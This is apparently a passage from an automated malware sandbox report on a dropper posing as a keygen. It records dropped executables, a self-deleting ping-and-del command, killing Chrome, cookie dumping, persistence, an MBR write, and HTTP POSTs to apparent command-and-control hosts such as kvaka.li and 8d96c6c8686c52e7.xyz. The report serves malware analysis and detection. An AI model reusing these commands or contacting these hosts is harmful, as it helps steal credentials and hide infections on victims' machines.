        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3904
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe"
        8⤵
        
        PID:4056
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        9⤵
        Runs ping.exe
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe
        
        C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe 200 installp1
        7⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Writes to the Master Boot Record (MBR)
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2796
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1784
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:2256
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe"
        8⤵
        
        PID:2140
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        9⤵
        Runs ping.exe
        
        PID:3244
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:580
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        8⤵
        Runs ping.exe
        
        PID:2760
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of AdjustPrivilegeToken
      PID:3828
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:3928
    - - C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
        5⤵
        Executes dropped EXE
        
        PID:3388
    - - C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4076

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2784
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 7426A0D026358E411E95742ACF6B6044 C
  2⤵
  - Loads dropped DLL
  PID:184

Network

DNS

kvaka.li

Remote address:

8.8.8.8:53

Request

kvaka.li

IN A

Response

kvaka.li

IN A

172.67.194.164

kvaka.li

IN A

104.18.57.131

kvaka.li

IN A

104.18.56.131
DNS

a.kvaka.li

Remote address:

8.8.8.8:53

Request

a.kvaka.li

IN A

Response

a.kvaka.li

IN A

104.18.57.131

a.kvaka.li

IN A

104.18.56.131

a.kvaka.li

IN A

172.67.194.164
POST

http://kvaka.li/1210776429.php

keygen-step-1.exe

Remote address:

172.67.194.164:80

Request

POST /1210776429.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: kvaka.li
Content-Length: 101
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:03:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=de6d7b154a0f48c1e27dfa01a2a43c9191605715420; expires=Fri, 18-Dec-20 16:03:40 GMT; path=/; domain=.kvaka.li; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.7
X-Page-Speed: 1.13.35.2-0
Cache-Control: max-age=0, no-cache
CF-Cache-Status: DYNAMIC
cf-request-id: 067db1fc5300000c1d6f8dc000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=26hs01F9lrFO0glhu%2FI1ca9m%2F3zGLXmUIIUItFrEFsMB7v0z2trUjW71tAE0dT573ZraI3V%2Bxqpk8vtViSfsPRwPj%2FHrGLi9Aw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ec408d910c1d-AMS
GET

https://a.kvaka.li/ip.php

intro.exe

Remote address:

104.18.57.131:443

Request

GET /ip.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; wbx 1.0.0; Zoom 3.6.0)
Host: a.kvaka.li
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily

Date: Wed, 18 Nov 2020 16:03:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d757ad59817f7c70251f96582801520ba1605715421; expires=Fri, 18-Dec-20 16:03:41 GMT; path=/; domain=.kvaka.li; HttpOnly; SameSite=Lax
X-Powered-By: PHP/7.4.7
Location: https://iplogger.org/1ahRe7
X-Page-Speed: 1.13.35.2-0
Cache-Control: max-age=0, no-cache
CF-Cache-Status: DYNAMIC
cf-request-id: 067db200a70000fa440dbdc000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZmGShMVTl%2BDCF3qvn9CAkJ26Bkf6PPUbHTHlBAHGFIqRhzQLEa1lPIEbnExng7vRY7IQZHtf6nt8BGCX2JC9DAnJy5rd5zdwZQ9g"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ec477a63fa44-AMS
GET

https://a.kvaka.li/ip.php?auth=99e2d4bb541d744938d10e755a05f2d5

intro.exe

Remote address:

104.18.57.131:443

Request

GET /ip.php?auth=99e2d4bb541d744938d10e755a05f2d5 HTTP/1.1
Host: a.kvaka.li
Connection: Keep-Alive
Cookie: __cfduid=d757ad59817f7c70251f96582801520ba1605715421

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:03:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
x-powered-by: PHP/7.4.7
x-page-speed: 1.13.35.2-0
cache-control: max-age=0, no-cache
CF-Cache-Status: DYNAMIC
cf-request-id: 067db202380000fa4435ada000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Gm520RkPkcQMWTTB1fnkH2iDb6NOImwb3lb5t0ERY4%2BtMJjwZzn9SE1iaY5sTbLSUGBwmrwN%2BIKzWpartmTK7eLcrUkKUEUQubxE"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ec49f851fa44-AMS
DNS

iplogger.org

Remote address:

8.8.8.8:53

Request

iplogger.org

IN A

Response

iplogger.org

IN A

88.99.66.31
GET

https://iplogger.org/1ahRe7

intro.exe

Remote address:

88.99.66.31:443

Request

GET /1ahRe7 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; wbx 1.0.0; Zoom 3.6.0)
Connection: Keep-Alive
Host: iplogger.org

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:03:41 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=s75jqeqj8flri0h68ta0lgba51; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: c3231fbe2832ceb1b4d73aa3a87c8d83d91275abd680d903b3f15887dea9a8dc
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
DNS

ffdownload.online

Remote address:

8.8.8.8:53

Request

ffdownload.online

IN A

Response

ffdownload.online

IN A

194.54.83.254
POST

http://ffdownload.online/business/receive

002.exe

Remote address:

194.54.83.254:80

Request

POST /business/receive HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Host: ffdownload.online
Content-Length: 512
Connection: Close
Cache-Control: no-cache

Response

HTTP/1.1 200

Set-Cookie: JSESSIONID=c7ef9992-b5ad-4a27-89e5-6c645527244b; Path=/; HttpOnly
Content-Length: 0
Date: Wed, 18 Nov 2020 16:03:43 GMT
Connection: close
GET

http://101.36.107.74/seemorebty/il.php?e=jg2_2qua

jg2_2qua.exe

Remote address:

101.36.107.74:80

Request

GET /seemorebty/il.php?e=jg2_2qua HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
Accept-Language: en-US,en;q=0.9
Referer: https://www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
Host: 101.36.107.74

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:03:51 GMT
Server: Apache/2.4.37 (centos)
X-Powered-By: PHP/7.2.24
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
GET

https://iplogger.org/ZdnY7

jg2_2qua.exe

Remote address:

88.99.66.31:443

Request

GET /ZdnY7 HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
Accept-Language: en-US,en;q=0.9
Referer: https://www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
Host: iplogger.org

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:03:52 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=5uft5mk4qurpuehn6ihdk9qlj4; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: ec5f700afd95c4901273a4ec86c0feb322adec405ece3a022dc8272621895297
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
DNS

8d96c6c8686c52e7.xyz

Remote address:

8.8.8.8:53

Request

8d96c6c8686c52e7.xyz

IN A

Response

8d96c6c8686c52e7.xyz

IN A

104.18.42.86

8d96c6c8686c52e7.xyz

IN A

104.18.43.86

8d96c6c8686c52e7.xyz

IN A

172.67.204.197
POST

http://8d96c6c8686c52e7.xyz/info/w

aliens.exe

Remote address:

104.18.42.86:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 93
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:03:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d2ef227bcd3aeb8bd8b38fdf63671aa9b1605715434; expires=Fri, 18-Dec-20 16:03:54 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db235ac0000004ead8a6000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Jwww%2FpkOohwXAz67j6vySbgr9mLohYMciRHPYoZrjb9EIE16XyOxmBBc2WNTG0YjqT4zqhcywjjhRHsRfHwRtGMXsYz%2F%2Bp4LZ%2B6o3INNf6RXWTzEYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ec9c4bab004e-LHR
POST

http://8d96c6c8686c52e7.xyz/info/w

aliens.exe

Remote address:

104.18.42.86:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 93
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:03:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=df5d7efa35ca3fc6f9467cea8498693081605715436; expires=Fri, 18-Dec-20 16:03:56 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db23d660000004ec22ac000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=I85qLqVhM5Mg353%2F2qfz0SDegLKr%2FeMdUObP5ku36NelvEQQoFYGITnPNtpBIOH%2Fjkm99wvN%2BYYkCXRQwwh27tHZvZLTpizygQDB3AmsobOZDgUQCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42eca8acc3004e-LHR
POST

http://8d96c6c8686c52e7.xyz/info/w

aliens.exe

Remote address:

104.18.42.86:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 93
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dd55be1bf194f57c671070cf5015f08491605715438; expires=Fri, 18-Dec-20 16:03:58 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db2452a0000004e06392000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1ZY3ie5AVWMXaX%2FjhUb4nCGku629OW9s0dtQ5AXT8WnkfuvSSx6rpsMLhchwmZxjobC37qSHQB4sgC04XEKImUnu0wLxHDN89MzNrZrIhhDrLPvxqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ecb519cc004e-LHR
POST

http://8d96c6c8686c52e7.xyz/info/w

97535F5358BB4449.exe

Remote address:

104.18.42.86:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=de1f93ed40149aae25d4cf8665ce298661605715444; expires=Fri, 18-Dec-20 16:04:04 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db25abf0000dc1f038c5000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FvwCBHo73yfj3PMFC3ZxVKXmwcXXyY4dBqvbdkQJmgCr7vXs2jDxIuNHRvlCwAUR65dHSUFdsE%2BmTjVspATkO04DxEIB2tv5KTlkcLneMtxRxPzpLg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ecd79f07dc1f-LHR
POST

http://8d96c6c8686c52e7.xyz/info/e

97535F5358BB4449.exe

Remote address:

104.18.42.86:80

Request

POST /info/e HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 721
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d8bfa23c2018296e17bdb0680313052671605715450; expires=Fri, 18-Dec-20 16:04:10 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db271a30000dc1fc834c000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=yyPfiW72RMyYfROXu0zzzS3%2B7%2BNSctnLTpHnj%2Frc2aZVgH2Dube3qs2NQPG6E7rUCJuV%2FqriDhur9HzhmCDwA5ydt4NnJNjsaYHvbKzbeKzWaOdA%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ecfc38cddc1f-LHR
POST

http://8d96c6c8686c52e7.xyz/info/w

97535F5358BB4449.exe

Remote address:

104.18.42.86:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d20aad36f510743cfb8b24fe805d211d61605715451; expires=Fri, 18-Dec-20 16:04:11 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db2785a0000dc1fa4a54000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=RUgnKn9HIQ8WUv%2B8Vgo81OFQbDNeXzDrXKmJiAEfceBYJxlEp%2FL8FRDc8pdP9lC0D3irea39NzUnLeduAKtHylO8NRny7ptsj0YXt4l79SztH6l%2F7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ed06f9d7dc1f-LHR
POST

http://8d96c6c8686c52e7.xyz/info/g

97535F5358BB4449.exe

Remote address:

104.18.42.86:80

Request

POST /info/g HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 285
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d8297bd66f1764f48a899e232d86821e61605715456; expires=Fri, 18-Dec-20 16:04:16 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db289370000dc1f03973000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=hLHDduMjgeA0AZMVtb197VUrk%2F6NEh5eWhPxBcdpQzD7giAOgbauLK14GOlxcUYZgAKqAGxg%2B0UjQGr7CiHS%2Bz4ZZPEDPsxTgi3RRN%2BJIDt6wYcsFA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ed21fc7fdc1f-LHR
POST

http://8d96c6c8686c52e7.xyz/info/w

97535F5358BB4449.exe

Remote address:

104.18.42.86:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d8db053ed8afecce8b082dcae0d06bcc71605715457; expires=Fri, 18-Dec-20 16:04:17 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db28df80000dc1f00052000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=snKO0PsjYyrqWfm19wmH%2Bkqur8E7XUk3uRtIhdiR3c%2BIz30cRkg7mtOnn4wy2rXpncnxQ%2FIn2csibmdwy%2F%2FHKOIJOa8M%2FTDOs8Z6%2FFJ84q8rmSKWYA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ed298f23dc1f-LHR
GET

http://8d96c6c8686c52e7.xyz/info/r

97535F5358BB4449.exe

Remote address:

104.18.42.86:80

Request

GET /info/r HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
upgrade-insecure-requests: 1
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da89620b50c4302b8fe4597fd8dea84081605715459; expires=Fri, 18-Dec-20 16:04:19 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db293dd0000dc1fd4269000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5ZPjJi2S7dZtcwMl4Nn9uHG3%2BMl%2F%2BmP0r%2Fwid43mdBo58OoRIGdiVaxfd8ouTy1VyGWuJKbr9RRIVEP74tzcxohd5jAFjTkUOjUQsfT%2BRdulurkdDw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ed32fd95dc1f-LHR
POST

http://8d96c6c8686c52e7.xyz/info/a

97535F5358BB4449.exe

Remote address:

104.18.42.86:80

Request

POST /info/a HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 261
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=df5fb3c4aca55eb83270059945127ade81605715461; expires=Fri, 18-Dec-20 16:04:21 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db29f300000dc1fe2ac8000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=oz6en2f7lv2nhpy3QmXua1B%2BjRr4CQaLG%2B9mQUdkFx6uij8nosHxACqKj3cOU94kdpH%2B7qEA%2FasO5SZfstF%2FAzsufd8bwlz%2BEmWwuGIpnge24H%2B9aw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ed451c88dc1f-LHR
POST

http://8d96c6c8686c52e7.xyz/info/w

97535F5358BB4449.exe

Remote address:

104.18.42.86:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:44 GMT
